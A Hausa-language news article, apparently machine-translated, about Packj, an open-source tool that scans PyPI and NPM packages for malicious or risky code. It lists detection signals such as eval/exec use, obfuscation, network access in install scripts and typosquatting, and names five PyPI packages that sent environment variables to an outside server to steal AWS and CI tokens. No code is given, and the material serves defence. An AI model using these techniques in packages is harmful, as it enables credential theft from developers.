Masu haɓaka dandamali na Packj, waɗanda ke yin nazari kan tsaro na ɗakunan karatu, sun buga buɗaɗɗen kayan aikin layin umarni wanda ke ba su damar gano tsarin haɗari a cikin fakiti waɗanda za su iya haɗawa da aiwatar da munanan ayyuka ko kasancewar raunin da ake amfani da su don kai hare-hare. akan ayyukan ta yin amfani da fakitin da ake tambaya ("sarkar samar da kayayyaki"). Ana tallafawa duba fakiti a cikin yarukan Python da JavaScript, wanda aka shirya a cikin kundayen adireshi na PyPi da NPM (suna kuma shirin ƙara tallafi ga Ruby da RubyGems a wannan watan). An rubuta lambar kayan aikin a cikin Python kuma an rarraba ta ƙarƙashin lasisin AGPLv3.
A yayin nazarin fakiti dubu 330 ta amfani da kayan aikin da aka tsara a cikin ma'ajiyar PyPi, an gano fakitin mugunta 42 tare da bayan gida da fakiti masu haɗari dubu 2.4. A yayin binciken, ana yin nazarin lambar a tsaye don gano fasalulluka na API da kimanta kasancewar sanannun raunin da aka lura a cikin bayanan OSV. Ana amfani da fakitin MalOSS don tantance API. Ana yin nazarin lambar fakitin don kasancewar alamu na yau da kullun da aka saba amfani da su a cikin malware. An shirya samfuran bisa binciken fakiti 651 tare da tabbatar da munanan ayyuka.
Hakanan yana gano sifofi da metadata waɗanda ke haifar da haɓakar haɗarin rashin amfani, kamar aiwatar da toshe ta hanyar “eval” ko “exec,” samar da sabuwar lamba yayin aiki, ta amfani da dabarun lambar ɓoye, sarrafa masu canjin yanayi, da samun dama ga waɗanda ba manufa ba. fayiloli, samun damar albarkatun cibiyar sadarwa a cikin rubutun shigarwa (setup.py), ta yin amfani da nau'ikan nau'ikan (bayyanar da sunaye masu kama da sunayen mashahuran ɗakunan karatu), gano ayyukan da ba su daɗe da watsi da su, ƙayyadaddun imel da gidajen yanar gizo waɗanda ba su wanzu, rashin wurin ajiyar jama'a tare da lamba.
Bugu da ƙari, za mu iya lura da ganewar wasu masu bincike na tsaro na fakitin ɓarna guda biyar a cikin ma'ajin PyPi, wanda ya aika abubuwan da ke cikin masu canjin yanayi zuwa uwar garken waje tare da tsammanin satar alamun don AWS da ci gaba da tsarin haɗin kai: loglib-modules (an gabatar da shi azaman kayayyaki don halaltaccen ɗakin karatu na loglib), pyg-modules, pygrata da pygrata-utils (wanda aka ɗauka azaman ƙari ga halaltaccen ɗakin karatu na pyg) da hkg-sol-utils.
source: budenet.ru